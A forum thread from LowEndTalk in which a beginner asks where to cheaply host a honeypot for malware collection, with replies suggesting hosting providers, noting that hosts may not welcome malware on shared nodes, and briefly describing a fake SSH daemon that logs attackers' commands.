Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Good place to run a honeypot?
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Good place to run a honeypot?

Id like a to run a honeypot primarily for malware collection. Id need a server powerful enough to run Xubuntu in a VM (which itself will not be headless). If I could install the xubuntu iso on the server directly that would be even better. Im just getting into the area so I dont plan to spend much money on it.

Comments

• Kimsufi?

• Out or curiosity, I've always wanted to do some malware analysis and collection. What tools do you use and what do you need to learn?

/offtopic

• Vultr allows custom ISOs

• gestiondbigestiondbi Member, Patron Provider

@hostnoob said:
    Vultr allows custom ISOs

Yes, but not sure they allow malware on their nodes...

• rds100rds100 Member
    edited October 2014

davidgestiondbi said: Yes, but not sure they allow malware on their nodes...

Malware detection is not malware ;-)
    For instance there is a fake ssh daemon, when some brute forcer connects to it, it pretends he can login and then starts logging the commands he tries to execute.

Thanked by 1aglodek
  • Please do share your findings/statistics with LET if you succeed.

• @honeyme Is it a custom ISO you've created or a distro you've downloaded from somewhere? It's an interesting idea.

• BrianHarrisonBrianHarrison Member, Patron Provider

Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)

Thanked by 1gestiondbi
  • @BrianHarrison said: Sounds like you'd be better served with a dedicated server -- attracting malware on a VM node won't make your host happy :-)